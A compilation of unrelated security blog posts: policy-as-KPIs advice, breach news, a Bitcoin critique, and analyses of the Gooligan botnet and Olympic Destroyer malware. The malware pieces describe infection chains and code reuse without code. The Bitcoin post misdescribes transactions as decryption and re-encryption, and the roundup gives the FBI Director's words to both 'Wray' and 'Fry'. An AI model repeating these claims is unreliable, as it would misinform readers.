I started my security (post-sysadmin) career heavily focused on security policy frameworks. It took me down many roads, but everything always came back to a few simple notions, such as that policies were a means of articulating security direction, that you had to prescriptively articulate desired behaviors, and that the more detail you could put into the guidance (such as in standards, baselines, and guidelines), the better off the organization would be. Except, of course, that in the real world nobody ever took time to read the more detailed documents, Ops and Dev teams really didn't like being told how to do their jobs, and, at the end of the day, I was frequently reminded that publishing a policy document didn't translate to implementation.

Subsequently, I've spent the past 10+ years thinking about better ways to tackle policies, eventually reaching the point where I believe "less is more" and that anything written and published in a place and format that isn't "work as usual" will rarely, if ever, get implemented without a lot of downward force applied. I've seen both good and bad policy frameworks within organizations. Often they cycle around between good and bad. Someone will build a nice policy framework, it'll get implemented in a number of key places, and then it will languish from neglect and inadequate upkeep until it's irrelevant and ignored. This is not a recipe for lasting success.

Thinking about it further this week, it occurred to me that part of the problem is thinking in the old "compliance" mindset. Policies are really to blame for driving us down the checkbox-compliance path. Sure, we can easily stand back and try to dictate rules, but without the adequate authority to enforce them, and without the resources needed to continually update them, they're doomed to obsolescence. Instead, we need to move to that "security as code" mentality and find ways to directly codify requirements in ways that are naturally adapted and maintained.

End Dusty Tomes and (most) Out-of-Band Guidance

The first daunting challenge of security policy framework reform is to throw away the old, broken approach with as much gusto and finality as possible. Yes, there will always be a need for certain formally documented policies, but overall an organization Does. Not. Need. large amounts of dusty tomes providing out-of-band guidance to a non-existent audience.

Now, note a couple things here. First, there is a time and a place for providing out-of-band guidance, such as via direct training programs. However, it should be the minority of guidance, and wherever possible you should seek to codify security requirements directly into systems, applications, and environments. For a significant subset of security practices, it turns out we do not need to repeatedly consider whether or not something should be done, but can instead make the decision once and then roll it out everywhere as necessary and appropriate.

Second, we have to realize and accept that traditional policy (and related) documents only serve a formal purpose, not a practical or pragmatic purpose. Essentially, the reason you put something into writing is because a) you're required to do so (such as by regulations), or b) you're driven to do so due to ongoing infractions or the inability to directly codify requirements (for example, requirements on human behavior). What this leaves you with are requirements that can be directly implemented and that are thus easily measurable.

KPIs as Policies (et al.)

If the old ways aren't working, then it's time to take a step back and think about why that might be and what might be better going forward. I'm convinced the answer to this query lies in stretching the "security as code" notion a step further by focusing on security performance metrics for everything and everyone instead of security policies. Specifically, if you think of policies as requirements, then you should be able to recast those as metrics and key performance indicators (KPIs) that are easily measured, and in turn are easily integrated into dashboards. Moreover, going down this path takes us into a much healthier sense of quantitative reasoning, which can pay dividends for improved information risk awareness, measurement, and management.

Applied, this approach scales very nicely across the organization. Businesses already operate on a KPI model, and converting security requirements (née policies) into specific measurables at various levels of the organization means ditching the ineffective, out-of-band approach previously favored for directly specifying, measuring, and achieving desired performance objectives. Simply put, we no longer have to go out of our way to argue for people to conform to policies, but instead simply start measuring their performance and incentivize them to improve to meet performance objectives. It's then a short step to integrating security KPIs into all roles, even going so far as to establish departmental, if not whole-business, security performance objectives that are then factored into overall performance evaluations.

Examples of security policies-become-KPIs might include metrics around vulnerability and patch management, code defect reduction and remediation, and possibly even phishing-related metrics that are rolled up to the department or enterprise level. When creating security KPIs, think about the policy requirements as they're written and take time to truly understand the objectives they're trying to achieve. Convert those objectives into measurable items, and there you are on the path to KPIs as policies. For more on thoughts on security metrics, I recommend checking out the CIS Benchmarks as a starting point.

Better Reporting and the Path to Accountability

Converting policies into KPIs means that nearly everything is natively built for reporting, which in turn enables executives to have better insight into the security and information risk of the organization. Moreover, shifting the focus to specific measurables means that we get away from the out-of-band dusty tomes, instead moving toward achieving actual results. We can now look at how different teams, projects, applications, platforms, etc., are performing and make better-informed decisions about where to focus investments for improvements.

This notion also potentially sparks an interesting future for current GRC-ish products. If policies go away (mostly), then we don't really need repositories for them. Instead, GRC products can shift to being true performance monitoring dashboards, allowing those products to broaden their scope while continuing to adapt other capabilities, such as those related to the so-called "SOAR" market (Security Orchestration, Automation, and Response). If GRC products are to survive, I suspect it will be by either heading further down the information risk management path, pulling in security KPIs in lieu of traditional policies and compliance, or it will drive more toward SOAR+dashboards with a more tactical performance focus (or some combination of the two). Suffice to say, I think GRC as it was once known and defined is in its final days of usefulness.

There's one other potentially interesting tie-in here, and that's to overall data analytics, which I've noticed slowly creeping into organizations. A lot of the focus has been on using data lakes, mining, and analytics in lieu of traditional SIEM and log management, but I think there's also a potentially interesting confluence with security KPIs, too. In fact, thinking about pulling in SOAR capabilities and other monitoring and assessment capabilities and data, it's not unreasonable to think that KPIs become the tweakable dials CISOs (and up) use to balance out risk vs reward in helping provide strategic guidance for address information risk within the enterprise. At any rate, this is all very speculative and unclear right now, but something to nonetheless watch. But I have digressed...

The bottom line here is this: traditional policy frameworks have generally outlived their usefulness. We cannot afford to continue writing and publishing security requirements in a format that isn't easily accessible in a "work as usual" format. In an Agile/DevOps world, "security as code" is imperative, and that includes converting security requirements into KPIs.

Warning as Mac malware exploits climb 270%

Reputable anti-malware security vendor Malwarebytes is warning Mac users that malware attacks against the platform climbed 270 percent last year.

Be careful out there

The security experts also warn that four new malware exploits targeting Macs have been identified in the first two months of 2018, noting that many of these exploits were identified by users, rather than security firms.

In one instance, a Mac user discovered that their DNS settings had been changed and found themselves unable to change them back.

To read this article in full, please click here

What John Oliver gets wrong about Bitcoin

John Oliver covered bitcoin/cryptocurrencies last night. I thought I'd describe a bunch of things he gets wrong.

How Bitcoin works

Nowhere in the show does it describe what Bitcoin is and how it works.

Discussions should always start with Satoshi Nakamoto's original paper. The thing Satoshi points out is that there is an important cost to normal transactions, namely, the entire legal system designed to protect you against fraud, such as the way you can reverse the transactions on your credit card if it gets stolen. The point of Bitcoin is that there is no way to reverse a charge. A transaction is done via cryptography: to transfer money to me, you decrypt it with your secret key and encrypt it with mine, handing ownership over to me with no third party involved that can reverse the transaction, and essentially no overhead.

All the rest of the stuff, like the decentralized blockchain and mining, is all about making that work.

Bitcoin crazies forget about the original genesis of Bitcoin. For example, they talk about adding features to stop fraud, reversing transactions, and having a central authority that manages that. This misses the point, because the existing electronic banking system already does that, and does a better job at it than cryptocurrencies ever can. If you want to mock cryptocurrencies, talk about the "DAO", which did exactly that -- and collapsed in a big fraudulent scheme where insiders made money and outsiders didn't.

Sticking to Satoshi's original ideas are a lot better than trying to repeat how the crazy fringe activists define Bitcoin.

How does any money have value?

Oliver's answer is currencies have value because people agree that they have value, like how they agree a Beanie Baby is worth $15,000.

This is wrong. A better way of asking the question why the value of money changes. The dollar has been losing roughly 2% of its value each year for decades. This is called "inflation", as the dollar loses value, it takes more dollars to buy things, which means the price of things (in dollars) goes up, and employers have to pay us more dollars so that we can buy the same amount of things.

The reason the value of the dollar changes is largely because the Federal Reserve manages the supply of dollars, using the same law of Supply and Demand. As you know, if a supply decreases (like oil), then the price goes up, or if the supply of something increases, the price goes down. The Fed manages money the same way: when prices rise (the dollar is worth less), the Fed reduces the supply of dollars, causing it to be worth more. Conversely, if prices fall (or don't rise fast enough), the Fed increases supply, so that the dollar is worth less.

The reason money follows the law of Supply and Demand is because people use money, they consume it like they do other goods and services, like gasoline, tax preparation, food, dance lessons, and so forth. It's not like a fine art painting, a stamp collection or a Beanie Baby -- money is a product. It's just that people have a hard time thinking of it as a consumer product since, in their experience, money is what they use to buy consumer products. But it's a symmetric operation: when you buy gasoline with dollars, you are actually selling dollars in exchange for gasoline. That you call one side in this transaction "money" and the other "goods" is purely arbitrary, you call gasoline money and dollars the good that is being bought and sold for gasoline.

The reason dollars is a product is because trying to use gasoline as money is a pain in the neck. Storing it and exchanging it is difficult. Goods like this do become money, such as famously how prisons often use cigarettes as a medium of exchange, even for non-smokers, but it has to be a good that is fungible, storable, and easily exchanged. Dollars are the most fungible, the most storable, and the easiest exchanged, so has the most value as "money". Sure, the mechanic can fix the farmers car for three chickens instead, but most of the time, both parties in the transaction would rather exchange the same value using dollars than chickens.

So the value of dollars is not like the value of Beanie Babies, which people might buy for $15,000, which changes purely on the whims of investors. Instead, a dollar is like gasoline, which obey the law of Supply and Demand.

This brings us back to the question of where Bitcoin gets its value. While Bitcoin is indeed used like dollars to buy things, that's only a tiny use of the currency, so therefore it's value isn't determined by Supply and Demand. Instead, the value of Bitcoin is a lot like Beanie Babies, obeying the laws of investments. So in this respect, Oliver is right about where the value of Bitcoin comes, but wrong about where the value of dollars comes from.

Why Bitcoin conference didn't take Bitcoin

John Oliver points out the irony of a Bitcoin conference that stopped accepting payments in Bitcoin for tickets.

The biggest reason for this is because Bitcoin has become so popular that transaction fees have gone up. Instead of being proof of failure, it's proof of popularity. What John Oliver is saying is the old joke that nobody goes to that popular restaurant anymore because it's too crowded and you can't get a reservation.

Moreover, the point of Bitcoin is not to replace everyday currencies for everyday transactions. If you read Satoshi Nakamoto's whitepaper, it's only goal is to replace certain types of transactions, like purely electronic transactions where electronic goods and services are being exchanged. Where real-life goods/services are being exchanged, existing currencies work just fine. It's only the crazy activists who claim Bitcoin will eventually replace real world currencies -- the saner people see it co-existing with real-world currencies, each with a different value to consumers.

Turning a McNugget back into a chicken

John Oliver uses the metaphor of turning a that while you can process a chicken into McNuggets, you can't reverse the process. It's a funny metaphor.

But it's not clear what the heck this metaphor is trying explain. That's not a metaphor for the blockchain, but a metaphor for a "cryptographic hash", where each block is a chicken, and the McNugget is the signature for the block (well, the block plus the signature of the last block, forming a chain).

Even then that metaphor as problems. The McNugget produced from each chicken must be unique to that chicken, for the metaphor to accurately describe a cryptographic hash. You can therefore identify the original chicken simply by looking at the McNugget. A slight change in the original chicken, like losing a feather, results in a completely different McNugget. Thus, nuggets can be used to tell if the original chicken has changed.

This then leads to the key property of the blockchain, it is unalterable. You can't go back and change any of the blocks of data, because the fingerprints, the nuggets, will also change, and break the nugget chain.

The point is that while John Oliver is laughing at a silly metaphor to explain the blockchain becuase he totally misses the point of the metaphor.

Oliver rightly says "don't worry if you don't understand it -- most people don't", but that includes the big companies that John Oliver name. Some companies do get it, and are producing reasonable things (like JP Morgan, by all accounts), but some don't. IBM and other big consultancies are charging companies millions of dollars to consult with them on block chain products where nobody involved, the customer or the consultancy, actually understand any of it. That doesn't stop them from happily charging customers on one side and happily spending money on the other.

Thus, rather than Oliver explaining the problem, he's just being part of the problem. His explanation of blockchain left you dumber than before.


John Oliver mocks the Brave ICO ($35 million in 30 seconds), claiming it's all driven by YouTube personalities and people who aren't looking at the fundamentals.

And while this is true, most ICOs are bunk, the  Brave ICO actually had a business model behind it. Brave is a Chrome-like web-browser whose distinguishing feature is that it protects your privacy from advertisers. If you don't use Brave or a browser with an ad block extension, you have no idea how bad things are for you. However, this presents a problem for websites that fund themselves via advertisements, which is most of them, because visitors no longer see ads. Brave has a fix for this. Most people wouldn't mind supporting the websites they visit often, like the New York Times. That's where the Brave ICO "token" comes in: it's not simply stock in Brave, but a token for micropayments to websites. Users buy tokens, then use them for micropayments to websites like New York Times. The New York Times then sells the tokens back to the market for dollars. The buying and selling of tokens happens without a centralized middleman.

This is still all speculative, of course, and it remains to be seen how successful Brave will be, but it's a serious effort. It has well respected VC behind the company, a well-respected founder (despite the fact he invented JavaScript), and well-respected employees. It's not a scam, it's a legitimate venture.

How to you make money from Bitcoin?

The last part of the show is dedicated to describing all the scam out there, advising people to be careful, and to be "responsible". This is garbage.

It's like my simple two step process to making lots of money via Bitcoin: (1) buy when the price is low, and (2) sell when the price is high. My advice is correct, of course, but useless. Same as "be careful" and "invest responsibly".

The truth about investing in cryptocurrencies is "don't". The only responsible way to invest is to buy low-overhead market index funds and hold for retirement. No, you won't get super rich doing this, but anything other than this is irresponsible gambling.

It's a hard lesson to learn, because everyone is telling you the opposite. The entire channel CNBC is devoted to day traders, who buy and sell stocks at a high rate based on the same principle as a ponzi scheme, basing their judgment not on the fundamentals (like long term dividends) but animal spirits of whatever stock is hot or cold at the moment. This is the same reason people buy or sell Bitcoin, not because they can describe the fundamental value, but because they believe in a bigger fool down the road who will buy it for even more.

For things like Bitcoin, the trick to making money is to have bought it over 7 years ago when it was essentially worthless, except to nerds who were into that sort of thing. It's the same tick to making a lot of money in Magic: The Gathering trading cards, which nerds bought decades ago which are worth a ton of money now. Or, to have bought Apple stock back in 2009 when the iPhone was new, when nerds could understand the potential of real Internet access and apps that Wall Street could not.

That was my strategy: be a nerd, who gets into things. I've made a good amount of money on all these things because as a nerd, I was into Magic: The Gathering, Bitcoin, and the iPhone before anybody else was, and bought in at the point where these things were essentially valueless.

At this point with cryptocurrencies, with the non-nerds now flooding the market, there little chance of making it rich. The lottery is probably a better bet. Instead, if you want to make money, become a nerd, obsess about a thing, understand a thing when its new, and cash out once the rest of the market figures it out. That might be Brave, for example, but buy into it because you've spent the last year studying the browser advertisement ecosystem, the market's willingness to pay for content, and how their Basic Attention Token delivers value to websites -- not because you want in on the ICO craze.


John Oliver spends 25 minutes explaining Bitcoin, Cryptocurrencies, and the Blockchain to you. Sure, it's funny, but it leaves you worse off than when it started. It admits they "simplify" the explanation, but they simplified it so much to the point where they removed all useful information.

Weekly Cyber Risk Roundup: Payment Card Breaches, Encryption Debate, and Breach Notification Laws

This past week saw the announcement of several new payment card breaches, including a point-of-sale breach at Applebee’s restaurants that affected 167 locations across 15 states.

The malware, which was discovered on February 13, 2018, was “designed to capture payment card information and may have affected a limited number of purchases” made at Applebee’s locations owned by RMH Franchise Holdings, the company said in a statement.

News outlets reported many of the affected locations had their systems infected between early December 2017 and early January 2018. Applebee’s has close to 2,000 locations around the world and 167 of them were affected by the incident.

In addition to Applebees, MenuDrive issued a breach notification to merchants saying that its desktop ordering site was injected with malware designed to capture payment card information. The incident impacted certain transactions from November 5, 2017 to November 28, 2017.

“We have learned that the malware was contained to ONLY the Desktop ordering site of the version that you are using and certain payment gateways,” the company wrote. “Thus, this incident was contained to a part of our system and did NOT impact the Mobile ordering site or any other MenuDrive versions.”

Finally, there is yet another breach notification related to Sabre Hospitality Solutions’ SynXis Central Reservations System — this time affecting Preferred Hotels & Resorts. Sabre said that a unauthorized individual used compromised user credentials to view reservation information, including payment card information, for a subset of hotel reservations that Sabre processed on behalf of the company between June 2016 and November 2017.


Other trending cybercrime events from the week include:

  • Marijuana businesses targeted: MJ Freeway Business Solutions, which provides business management software to cannabis dispensaries, is notifying customers of unauthorized access to its systems that may have led to personal information being stolen. The Canadian medical marijuana delivery service JJ Meds said that it received an extortion threat demanding $1,000 in bitcoin in order to prevent a leak of customer information.
  • Healthcare breach notifications: The Kansas Department for Aging and Disability Services said that the personal information of 11,000 people was improperly emailed to local contractors by a now-fired employee. Front Range Dermatology Associates announced a breach related to a now-fired employee providing patient information to a former employee. Investigators said two Florida Hospital employees stole patient records, and local news reported that 9,000 individuals may have been impacted by the theft.
  • Notable data breaches: Ventiv Technology, which provides workers’ compensation claim management software solutions, is notifying customers of a compromise of employee email accounts that were hosted on Office365 and contained personal information. Catawba County services employees had their personal information compromised due to the payroll and human resources system being infected with malware. Flexible Benefit Service Corporation said that an employee email account was compromised and used to search for wire payment information. A flaw in Nike’s website allowed attackers to read server data and could have been leveraged to gain greater access to the company’s systems. A researcher claimed that airline Emirates is leaking customer data.
  • Other notable events: Cary E. Williams CPA is notifying employees, shareholders, trustees and partners of a ransomware attack that led to unauthorized access to its systems. The cryptocurrency exchange Binance said that its users were the target of “a large scale phishing and stealing attempt” and those compromised accounts were used to perform abnormal trading activity over a short period of time. The spyware company Retina-X Studios said that it “is immediately and indefinitely halting its PhoneSheriff, TeenShield, SniperSpy and Mobile Spy products” after being “the victim of sophisticated and repeated illegal hackings.”

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


There were several regulatory stories that made headlines this week, including the FBI’s continued push for a stronger partnership with the private sector when it comes to encryption, allegations that Geek Squad techs act as FBI spies, and new data breach notification laws.

In a keynote address at Boston College’s cybersecurity summit, FBI Director Christopher Wray said that there were 7,775 devices that the FBI could not access due to encryption in fiscal 2017, despite having approval from a judge. According to Fry, that meant the FBI could not access more than half of the devices they tried to access during the period.

“Let me be clear: the FBI supports information security measures, including strong encryption,” Fry said. “Actually, the FBI is on the front line fighting cyber crime and economic espionage. But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep the American people safe.”

However, Ars Technica noted that a consensus of technical experts has said that what the FBI has asked for is impossible.

In addition, the Electronic Frontier Foundation obtained documents via a Freedom of Information Act lawsuit that revealed the FBI and Best Buy’s Geek Squad have been working together for decades. In some cases Geek Squad techs were paid as much as $1,000 to be informants, which the EFF argued was a violation of Fourth Amendment rights as the computer searches were not authorized by their owners.

Finally, the Alabama senate unanimously passed the Alabama Breach Notification Act, and the bill will now move to the house.

“Alabama is one of two states that doesn’t have a data breach notification law,” said state Senator Arthur Orr, who sponsored Alabama’s bill. “In the case of a breach, businesses and organizations, including state government, are under no obligation to tell a person their information may have been compromised.”

With both Alabama and South Dakota recently introducing data breach notification legislation, every resident of the U.S. may soon be protected by a state breach notification law.

Security is not a buzz-word business model, but our cumulative effort

Security is not a buzz-word business model, but our cumulative effort

This article conveys my personal opinion towards security and it's underlying revenue model; I would recommend to read it with a pinch of salt (+ tequila, while we are on it). I shall be covering either side of the coin, the heads where pentesters try to give you a heads-up on underlying issues, and tails where the businesses still think they can address security at the tail-end of their development.

A recent conversation with a friend who's in information security triggered me to address the white elephant in the room. He works in a security services firm that provides intelligence feeds and alerts to the clients. Now he shared a case where his firm didn't share the right feed at the right time even though the client was "vulnerable" because the subscription model is different. I understand business is essential, but on the contrary isn't security a collective argument? I mean tomorrow if when this client gets attacked, are you going just to turn a blind eye because it didn't pay you well? I understand the remediation always cost money (or more efforts) but holding the alert to a client on some attack you witnessed in the wild based on how much money are they paying you is hard to contend.

I don't dream about the utopian world where security is obvious but we surely can walk in that direction.

What is security to a business?

Is it a domain, a pillar or with the buzz these days, insurance? Information security and privacy while being the talk of the town are still come where the business requirements end. I understand there is a paradigm shift to the left, a movement towards the inception for your "bright idea" but still we are far from an ideal world, the utopian so to speak! I have experienced from either side of the table - the one where we put ourselves in the shoes of hackers and the contrary where we hold hands with the developers to understand their pain points & work together to build a secure ecosystem. I would say it's been very few times that business pays attention to "security" from day-zero (yeah, this tells the kind of clients I am dealing with and why are in business). Often business owners say - Develop this application, based on these requirements, discuss the revenue model, maintenance costs, and yeah! Check if we need these security add-ons or do we adhere to compliance checks as no one wants auditors knocking at the door for all the wrong reasons.

This troubles me. Why don't we understand information security as important a pillar as your whole revenue model?

Security is not a buzz-word business model, but our cumulative effort

How is security as a business?

I have many issues with how "security" is being tossed around as a buzz-word to earn dollars, but very few respect the gravity or the very objective of its existence. I mean whether it's information, financial, or life security - they all have very realistic and quantifiable effects on someone's physical well-being. Every month, I see tens (if not hundreds) of reports and advisories where quality is embarrassingly bad. When you tap to find the right reasons - either the "good" firms are costly, or someone has a comfort zone with existing firms, or worst that neither the business care nor do they pressure firms for better quality. I mean at the end, it's a just plain & straightforward business transaction or a compliance check to make auditor happy.

Have you ever asked yourself the questions,

  1. You did a pentest justifying the money paid for your quality; tomorrow that hospital gets hacked, or patients die. Would you say you didn't put your best consultants/efforts because they were expensive for the cause? You didn't walk the extra mile because the budgeted hours finished?
  2. Now, to you Mr Business, CEO - You want to cut costs on security because you would prefer a more prominent advertisement or a better car in your garage, but security expenditure is dubious to you. Next time check how much companies and business have lost after getting breached. I mean just because it's not an urgent problem, doesn't say it can't be. If it becomes a problem, chances are it's too late. These issues are like symptoms; if you see them, you already are in trouble! Security doesn't always have an immediate ROI, I understand, but don't make it an epitome of "out of sight, out of mind". That's a significant risk you are taking on your revenue, employees or customers.

Now, while I have touched both sides of the problem in this short article; I hope you got the message (fingers crossed). Please do take security seriously, and not only as your business transaction! Every time you do something that involves security on either sides, think - You invest your next big crypto-currency in an exchange/ market that gets hacked because of their lack of due-diligence? Or, your medical records became public because someone didn't perform a good pen-test. Or, you lose your savings because your bank didn't do a thorough "security" check of its infrastructure. If you think you are untouchable because of your home router security; you, my friend are living in an illusion. And, my final rant to the firms where there are good consultants but the reporting, or seriousness in delivering the message to the business is so fcuking messed up, that all their efforts go in vain. Take your deliverable seriously; it's the only window business has to peep into the issues (existing or foreseen), and plan the remediation in time.

That's all my friends. Stay safe and be responsible; security is a cumulative effort and everyone has to be vigilant because you never know where the next cyber-attack be.

Happy Anniversary – Paul’s Security Weekly #550

This week, Stefano Righi of UEFI joins us for an interview! Sven Morgenroth, Security Researcher at Netsparker joins us for the Technical Segment! In the news, we have updates from FinFisher, Equifax, Facebook, and more on this episode of Paul's Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Taking down Gooligan: part 1 — overview

This series of posts recounts how, in November 2016, we hunted for and took down Gooligan, the infamous Android OAuth stealing botnet. What makes Gooligan special is its weaponization of OAuth tokens, something that was never observed in mainstream crimeware before. At its peak, Gooligan had hijacked over 1M OAuth tokens in an attempt to perform fraudulent Play store installs and reviews.

Gooligan marks a turning point in Android malware evolution as the first large scale OAuth crimeware

While I rarely talk publicly about it, a key function of our research team is to assist product teams when they face major attacks. Gooligan’s very public nature and the extensive cross-industry collaboration around its takedown provided the perfect opportunity to shed some light on this aspect of our mission.

Being part of the emergency response task force is a central aspect of our team, as it allows us to focus on helping our users when they need it the most and exposes us to tough challenges in real time, as they occur. Overcoming these challenges fuels our understanding of the security and abuse landscape. Quite a few of our most successful research projects started due to these escalations, including our work on fake phone verified accounts , the study of HTTPS interception , and the analysis of mail delivery security .

subject covered in this post

Given the complexity of this subject, I broke it down into three posts to ensure that I can provide a a full debrief of what went down and cover all the major aspects of the Gooligan escalation. This first post recounts the Gooligan origin story and offers an overview of how Gooligan works. The second post provides an in-depth analysis of Gooligan’s inner workings and an analysis of its network infrastructure. The final post discusses Gooligan various monetization schemas and its takedown.

This series of posts is modeled after the talk I gave with Oren Koriat from Check Point, at Botconf in December 2017, on the subject. Here is a re-recording of the talk:

You can get the slides here but they are pretty bare.

As OAuth token abuse is Gooligan’s key innovation, let’s start by quickly summarizing how OAuth tokens work, so it is clear why this is such a game changer.

What are Oauth tokens?

Oauth app list

OAuth tokens are the de facto standard for granting apps and devices restricted access to online accounts without sharing passwords and with a limited set of privileges. For example, you can use an OAuth token to only allow an app to read your Twitter timeline, while preventing it from changing your settings or posting on your behalf.

OAuth flow

Under the hood , the service provides the app, on your behalf, with an OAuth token that is tied to the exact privileges you want to grant. In a way that is similar but not exactly the same, when you sign up with your Google account on an Android device, Google gives the device a token that allows it to access Google services on your behalf. This is the long term token that Gooligan stole in order to impersonate users on the Play Store. You can read more about Android long term tokens here .


Gooligan overview

Overall, Gooligan is made of six key components:

  • Repackaged app: This is the initial payload, which is usually a popular repackaged app that was weaponized. This APK embedded a secondary hidden/encrypted payload.
  • Registration server: Record device information when it join the botnet after being rooted.
  • Exploit server: The exploit server is the system that will deliver the exact exploit needed to root the device, based on the information provided by the secondary payload. Having the device information is essential, as Kingroot only targeted unpatched older devices (4.x and below). The post-rooting process is also responsible for backdooring the phone recovery process to enable persistence.
  • Fraudulent app and ads C&C: This infrastructure is responsible for collecting exfiltrated data and telling the malware which (non-Google related) ads to display and which Play store app to boost.
  • Play Store app module: This is an injected library that allows the malware to issue commands to the Play store through the Play store app. This complex process was set up in an attempt to avoid triggering Play store protection.
  • Ads fraud module: This is a module that would regularly display ads to the users as an overlay. The ads were benign and came from an ad company that we couldn’t identify.


Analyzing Gooligan’s code allowed us to trace it back to earlier malware families, as it built upon their codebase. While those families are clearly related code-wise, we can't ascertain whether the same actor is behind all of them, because a lot of the shared features were extensively discussed in Chinese blogs.

Gooligan timeline

SnapPea the precursor

As visible in the timeline above, Gooligan’s genesis can be traced back to the SnapPea adware that emerged in March 2015 and was discovered by Check Point in July of the same year. SnapPea’s key innovation was the weaponization of the exploit kit Kingroot , which was until then used by enthusiasts to root their phones and install custom ROMs.

Blog post announcing SnapPea discovery

SnapPea Kingroot straightforward weaponization led to a rather unusual infection vector: its authors resorted to backdooring the backup application SnapPea to be able to infect victims. After an Android device was physically connected to an infected PC, the malicious SnapPea application used Kingroot to root the device in order to install malware on the device. Gooligan is related to SnapPea because Gooligan also use Kingroot exploits to root devices but in an untethered way via a custom remote server.

Following SnapPea footsteps Gooligan weaponizes the Kingroot exploits to root old unpatched Android devices.

Ghost Push the role model

Blog post discussing Ghost Push discovery

A few months after SnapPea appeared, Cheetah Mobile uncovered Ghost Push , which quickly became one of the largest Android (off-market) botnets. What set Ghost Push apart technically from SnapPea was the addition of code that allowed it to persist during the device reset. This persistence was accomplished by patching, among other things, the recovery script located in the system partition after Ghost Push gained root access in the same way Snappea did. Gooligan reused the same persistent code.

Gooligan borrowed from Ghost Push the code used to ensure its persistence across device resets.


As outline in this post Gooligan is a complex malware that built on previous malware generation and extend it to a brand new vector of attack: OAuth tokens theft.

Gooligan marks a turning point in Android malware evolution as the first large scale OAuth crimeware

Building up on this post, the next one of the serie will provide in-depth analysis of Gooligan’s inner workings and an analysis of its network infrastructure. The final post will discusses Gooligan various monetization schemas and its takedown

Thank you for reading this post till the end! If you enjoyed it, don’t forget to share it on your favorite social network so that your friends and colleagues can enjoy it too and learn about Gooligan.

To get notified when my next post is online, follow me on Twitter , Facebook , Google+ , or LinkedIn . You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS .

A bientôt!

Hunting down Gooligan — retrospective analysis

This talk provides a retrospective on how during 2017 Check Point and Google jointly hunted down Gooligan – one of the largest Android botnets at the time. Beside its scale what makes Gooligan a worthwhile case-study is its heavy reliance on stolen oauth tokens to attack Google Play’s API, an approach previously unheard of in malware.

This talk starts by providing an in-depth analysis of how Gooligan’s kill-chain works from infection and exploitation to system-wide compromise. Then building on various telemetry we will shed light on which devices were infected and how this botnet attempted to monetize the stolen oauth tokens. Next we will discuss how we were able to uncover the Gooligan infrastructure and how we were able to tie it to another prominent malware family: Ghostpush. Last but not least we will recount how we went about re-securing the affected users and takedown the infrastructure.

From Russia(?) with Code

The Olympic Destroyer cyberattack is a very recent and notable attack by sophisticated threat actors against a globally renowned 2-week sporting event that takes place once every four years in a different part of the world. Successfully attacking the Winter Olympics requires motivation, planning, resources and time.

Cyberattack campaigns are often a reflection of real world tensions and provide insight into the possible suspects in the attack. Much has been written about the perpetrators behind Olympic Destroyer emanating from either North Korea or Russia. Both have motivations. North Korea would like to embarrass its sibling South Korea, the holders of the 23rd Winter Olympics. Russia could be seeking revenge for the IOC ban on their team. And Russia has precedence, having previously been blamed for attacks on other sporting organizations, such as the intrusion at the World Anti Doping Agency that was targeted via a stolen International Olympic Committee account.

There has been much said about attribution, with accusations of misleading false flags and anti-forensics built into the malware. As Talos points out in their report, attribution is hard.

But attribution is not just hard, it’s often a wilderness of mirrors and, more often than not, a bit anticlimactic.

The motivation of our following analysis is not to point the finger of blame about who did the attacking, but to utilize our expertise in analyzing malware code and understanding the behaviors it exhibits to highlight the heritage, evolution and commonalities we found in the code of the Olympic Destroyer malware.

Initial Samples of Code Reuse

Besides analyzing the behavior of a sample, our sandbox performs several levels of code analysis, eventually extracting all code components, regardless if they are run at run-time or not. As we described in a blog post a few years ago, this technique is essential if we are to detect any dormant functionality that might be present within the sample.

After decomposing the code components in normalized basic blocks, the sandbox computes smart code hashes that are stored and indexed in our threat intelligence knowledge base. Over the last 3 years we have been collecting code hashes for millions of files, so when we want to hunt for other samples related to the same actor, we are able to query our backend for any other binaries that have been reusing significant amounts of code.

The rationale being that actors usually build up their code base over time, and reuse it over and over again across different campaigns. Code surely might evolve, but some components are bound to remain the same. This is the intuition that drove our investigation on Olympic Destroyer further. The first results were obviously some variants of the Olympic Destroyer binaries which we have already mentioned in our previous post. However, it quickly got way more interesting.

A very specific code hash led us through this process: 7CE26E95118044757D3C7A97CF9D240A (Lastline customers can use it to query our Global Threat Intelligence Network). This rare code hash surprisingly linked 21ca710ed3bc536bd5394f0bff6d6140809156cf, a payload of the Olympic Destroyer campaign, with some other samples of a remote access trojan, “TVSpy.” Though the actual internal name of the threat is TVRAT, the malware is known and labelled in VirusTotal as Trojan.Pavica or Trojan.Mezzo, none of which were previously connected to the original Olympic Destroyer campaign.

Figure 1 shows the actual code referenced by the code hash: it is a function used to read a buffer, and subsequently parse PE header from it.

Figure 1: The code referenced by the code hash 7CE26E95118044757D3C7A97CF9D240A shared by both the Olympic Destroyer sample 21ca710ed3bc536bd5394f0bff6d6140809156cf sha1 and TVSpy sample a61b8258e080857adc2d7da3bd78871f88edec2c.

This is not where code re-usage ends, as the actual function referencing and invoking the following fragment (see Figure 2) also shares almost all of the same logic. This function is responsible for loading PE file from the memory buffer and executing an entry point.

Figure 2: Function responsible for loading PE file from memory reused in both Olympic Destroyer and TV Spy

A Deeper Dive Based on Unusual Code

We decided to further investigate this piece of code since loading PE from memory is not all that common. Its origin opened several questions:

  1. Why is that piece of code the only link between the two samples?
  2. Were there any other samples sharing the same code?

Our first discovery was a Remote Access trojan called TVSpy, mentioned above. This family has been the subject of a few previous research investigations, and a recent Benkow Lab blog post (from November 2017) even reported that the source code was available on github.

Unfortunately, all links to github are now dead. But that didn’t stop us from finding the actual source code (or at least evidence that it was indeed published at some point). Apparently it was sold for $US500 on an underground Russian forum in 2015. Even though the original post and links are gone, a Russian information security forum kept a copy of the source code package alongside a description of the original sale announcement (see Figure 3).

Figure 3: TVSpy code as sold in an underground forum (according to researchers from

Not Enough – The Investigation Continued

Although interesting, this connection was eventually not enough to connect Olympic Destroyer to Russia or to TVSpy. So we kept digging. Further research finally identified the code in Figures 1 and 2 to be part of an open source project called LoadDLL (see Figure 4) and available on (first published back in March 2014).

Figure 4: Fragment of LoadDLL source code from LoadDLL project

However, a couple things still didn’t add up: why had we only managed to identify samples from 2017 even if the source code was released in 2014? What about older versions of TVSpy? How come our search didn’t return any of those samples? Were Olympic Destroyer and TVSpy samples from 2017 sharing more than just the LoadDLL code?

